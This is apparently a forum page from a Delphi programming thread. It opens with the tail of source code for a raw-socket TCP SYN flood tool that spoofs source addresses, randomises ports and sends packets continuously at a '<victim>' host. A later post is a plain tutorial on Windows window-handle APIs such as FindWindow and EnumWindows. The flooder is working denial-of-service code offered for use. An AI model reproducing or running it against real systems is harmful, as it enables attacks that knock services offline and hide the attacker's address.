PSeudohdr.protocol := 6; PSeudohdr.length := htons(20); PSeudohdr.tcphdr := TCPhdr^; TCPhdr.tcp_sum := CheckSum(@PSeudohdr^, 32); end; begin FillChar(Buf, Len, 0); SendSyn_FillIPhdr; SendSyn_FillTCPhdr; Sendto(SynOpt.Socket, Buf, Len, 0, SynOpt.SockAddr, Sizeof(SynOpt.SockAddr)); end; procedure SetDefaultOptions; begin SynOpt.SockAddr.sin_addr.S_addr := Resolve(PChar(ParamStr(1))); SetLength(SynOpt.DstPorts, 1); SynOpt.DstPorts[0] := 0; SynOpt.SockAddr.sin_family := AF_INET; SynOpt.SockAddr.sin_port := GetRandomValue(High(Word)) + 1; SetLength(SynOpt.SrcPorts, 1); SynOpt.SrcPorts[0] := 0; end; procedure SetParams; var i, pcount: Integer; pstr: string; Ch: Char; begin pcount := ParamCount; for i := 2 to pcount do begin pstr := ParamStr(i); Ch := #0; if Length(pstr) = 2 then begin if pstr[1] = '-' then Ch := pstr[2]; end; if Ch = #0 then Continue; case Ch of 'S': SynOpt.SpoofIP := Resolve(PChar(ParamStr(i + 1))); 'p': begin SynOpt.DstPorts := GetPorts(ParamStr(i + 1)); if Length(SynOpt.DstPorts) = 0 then begin Writeln('No valid ports found on the dst port list'); Halt(0); end; end; 's': begin SynOpt.SrcPorts := GetPorts(ParamStr(i + 1)); if Length(SynOpt.SrcPorts) = 0 then begin Writeln('No valid ports found on the src port list'); Halt(0); end; end; 'n': SynOpt.Num := StrtoIntDef(ParamStr(i + 1), 0); 'd': SynOpt.Delay := StrtoIntDef(ParamStr(i + 1), 0); end; end; end; procedure Usage(const Path: string); begin Write( 'usage: ' + Path + ' <victim> [options]'#13#10#13#10 + 'Options:'#13#10 + ' -S: Spoof host (0 is random (default))'#13#10 + ' -p: Comma separated list of dest ports (0 is random (default))'#13#10 + ' -s: Comma separated list of src ports (0 is random (default))'#13#10 + ' -n: Num of packets (0 is continuous (default))'#13#10 + ' -d: Delay (in ms) (default 0)'#13#10 ); Halt(0); end; begin Writeln(Banner); if ParamCount < 1 then Usage(ExtractFileName(ParamStr(0))); WSAStartUp($0101, WSAData); FillChar(SynOpt, Sizeof(SynOpt), 0); CreateSocket; try Randomize; SetDefaultOptions; if ParamCount > 1 then SetParams; UseDelay := SynOpt.Delay > 0; repeat for i := 0 to High(SynOpt.DstPorts) do begin for j := 0 to High(SynOpt.SrcPorts) do begin SendSyn(SynOpt.SrcPorts[j], SynOpt.DstPorts[i]); if UseDelay then Sleep(SynOpt.Delay); end; end; Inc(SynOpt.Sended); if CanUpdate(50, SynOpt.Sended = SynOpt.Num) then SetConsoleTitle(PChar('Count: ' + InttoStr(SynOpt.Sended))); until SynOpt.Sended = SynOpt.Num; finally CloseSocket(SynOpt.Socket); WSACleanUp; end; end.
  25. Gonzalez
    Author: bubzuru An important concept in Windows programming is the concept of an object handle. Many functions return a handle to an object that the function created or loaded from a resource. Internally, Windows keeps track of all of these handles, and the handle serves as the link through the operating system between the object and the application. There are several ways to obtain the handle of a window. I) FindWindow Syntax: FindWindow(lpClassName: PChar; {a pointer to a null-terminated class name string} lpWindowName: PChar {a pointer to a null-terminated window name string} ): HWND; {returns a handle to a window} 1. The FindWindow function retrieves the handle to the top-level window whose class name and window name match the specified strings. This function does not search child windows. If the function succeeds, the return value is the handle to the window that has the specified class name and window name. If the function fails, the return value is 0. Examples : Get the handle of Notepad by its Classname: procedure TForm1.Button1Click(Sender: TObject); var hNotepadWindow: HWND; begin hNotepadWindow := FindWindow('notepad', nil); end; Get the handle of Winword by its Classname and hide it/show it after 2 Sec.: Code: procedure TForm1.Button1Click(Sender: TObject); var hWordWindow: HWND; begin hWordWindow := FindWindow ('OpusApp', nil); ShowWindow(hWordWindow, SW_HIDE); Sleep(2000); ShowWindow(hWordWindow, SW_SHOW); end; Get the handle of Internet Explorer and minimize/close all its windows: procedure TForm1.Button1Click(Sender: TObject); var hIExplorer: HWND; begin hIExplorer := FindWindow('IEFrame', nil); if hIExplorer <> 0 then begin // Minimize IE: SendMessage(hIExplorer, WM_SYSCOMMAND, SC_MINIMIZE, 0); // Close IE: SendMessage(hIExplorer, WM_SYSCOMMAND, SC_CLOSE, 0); end; end; II) GetWindow FindWindowByTitle returns the handle of a window that contains a certain "WindowTitle". function FindWindowByTitle(WindowTitle: string): Hwnd; var NextHandle: Hwnd; NextTitle: array[0..260] of char; begin // Get the first window NextHandle := GetWindow(Application.Handle, GW_HWNDFIRST); while NextHandle > 0 do begin // retrieve its text GetWindowText(NextHandle, NextTitle, 255); if Pos(WindowTitle, StrPas(NextTitle)) <> 0 then begin Result := NextHandle; Exit; end else // Get the next window NextHandle := GetWindow(NextHandle, GW_HWNDNEXT); end; Result := 0; end; Example how to search for a window that contains the word "notepad" and maximize it. procedure TForm1.Button1Click(Sender: TObject); var h: hwnd; begin h := FindWindowByTitle('notepad'); if h <> 0 then // if we found notepad ShowWindow(h, SW_MAXIMIZE) else ShowMessage('not found.'); end; III. FindWindowEx {Syntax:} FindWindowEx(Parent: HWND; {a handle to a parent window} Child: HWND; {a handle to a child window} ClassName: PChar; {a pointer to a null-terminated class name string} WindowName: PChar {a pointer to a null-terminated window name string} ): HWND; {returns a handle to a window} Description: FindWindowEx retrieves the handle of the window with the specified class name and window name. Unlike FindWindow, this function searches child windows, starting with the one following the given child window. Example to find a TButton (Child Window) on a TForm procedure TForm1.Button1Click(Sender: TObject); var FoundWindow: HWND; WindowText: array[0..255] of char; begin {Find a TButton child window} FoundWindow := FindWindowEx(Form1.Handle, 0, 'TButton', nil); {Get its text} GetWindowText(FoundWindow, WindowText, 255); {Display it} label1.Caption := 'FindWindowEx found window handle ' + IntToStr(FoundWindow) + ': ' + WindowText; end; Example to search for Edit field nr. x in another application and send a text to it function FindControlByNumber(hApp: HWND; ControlClassName: string; ControlNr: Word = 1): HWND; var i: Word; hControl: HWND; begin Result := 0; if IsWindow(hApp) then begin Dec(ControlNr); hControl := 0; for i := 0 to ControlNr do begin hControl := FindWindowEx(hApp, hControl, PChar(ControlClassName), nil); if hControl = 0 then Exit; end; end; Result := hControl; end; procedure SetEditText(hApp: HWND; EditClassName, AText: string; EditNr: Integer); var hEdit: HWND; begin // Search for the 2. Edit Field in a application hEdit := FindControlByNumber(FindWindow('Write_Here_Class_Of_App', nil), 'Edit', 2); if hEdit <> 0 then // Test: Send a "Hello" to the Edit Field SendMessage(hEdit, WM_SETTEXT, 0, Integer(PChar('Hello'))); end; IV) EnumWindows // Syntax: EnumWindows(lpEnumFunc: TFNWndEnumProc; {the address of the enumeration callback function} lParam: LPARAM {a 32-bit application-defined value} ): BOOL; {returns TRUE or FALSE} The EnumWindows function enumerates all top-level windows on the screen by passing the handle of each window, in turn, to an application-defined callback function. EnumWindows continues until the last top-level window is enumerated or the callback function returns FALSE. Callback Syntax: EnumWindowsProc(hWnd: HWND; {a handle to a top-level window} lParam: LPARAM {the application-defined data} ): BOOL; {returns TRUE or FALSE} Example how to list all Top-Level Windows in a Listbox. function EnumWindowsProc(wHandle: HWND; lb: TListBox): Bool; stdcall; export; var Title, ClassName: array[0..255] of char; begin Result := True; GetWindowText(wHandle, Title, 255); GetClassName(wHandle, ClassName, 255); if IsWindowVisible(wHandle) then lb.Items.Add(string(Title) + '-' + string(ClassName)); end; procedure TForm1.Button1Click(Sender: TObject); begin EnumWindows(@EnumWindowsProc, Integer(Listbox1)); end; V) EnumChildWindows //Syntax: EnumerateChildWindows(hWnd: HWND;{a handle to a top-level window} lParam: LPARAM): {a 32-bit application-defined value} BOOL; stdcall; {returns TRUE or FALSE} Description : The EnumChildWindows function enumerates the child windows that belong to the specified parent window by passing the handle of each child window, in turn, to an application-defined callback function. EnumChildWindows continues until the last child window is enumerated or the callback function returns False. Here is an example that lists the controls on a TPrintDialog function EnumProc(wnd: HWND; Lines: TStrings): BOOL; stdcall; var buf, Caption: array[0..255] of char; begin Result := True; GetClassName(wnd, buf, SizeOf(buf) - 1); SendMessage(wnd, WM_GETTEXT, 256, Integer(@Caption)); Lines.Add(Format('ID: %d, ClassName: %s, Caption: %s', [GetDlgCtrlID(wnd), buf, Caption])); end; procedure TForm1.PrintDialog1Show(Sender: TObject); begin Memo1.Clear; EnumChildWindows(printdialog1.Handle, @EnumProc, Integer(memo1.Lines)); end; VI) EnumThreadWindows // Syntax: EnumThreadWindows(dwThreadId: DWORD; {the thread identification number} lpfn: TFNWndEnumProc; {the address of the enumeration callback function} lParam: LPARAM {a 32-bit application-defined value} ): BOOL; {returns TRUE or FALSE} Description This function enumerates all of the nonchild windows associated with the specified thread. Each window handle associated with the specified thread is passed to an application-defined callback function. This function will continue until all of the windows are enumerated or the callback function returns False. Syntax of the Callback function: EnumThreadWndProc(hWnd: HWND; {a handle to a window} lParam: LPARAM {the application-defined data} ): BOOL; function EnumerateThreadWindows(Wnd: HWND; Data: lParam): BOOL; var WindowText: array[0..255] of char; // holds the text of the window begin { Get the text from the window } GetWindowText(Wnd, WindowText, 255); { Display it in the listbox} Form1.ListBox1.Items.Add(WindowText); { Continue the enumeration } Result := True; end; procedure TForm1.Button1Click(Sender: TObject); begin { Clear the listbox } ListBox1.Items.Clear; { Enumerate all windows that belong to the current thread } EnumThreadWindows(GetCurrentThreadID, @EnumerateThreadWindows, 0); end;
      • 1
      • Downvote
×
×
  • Create New...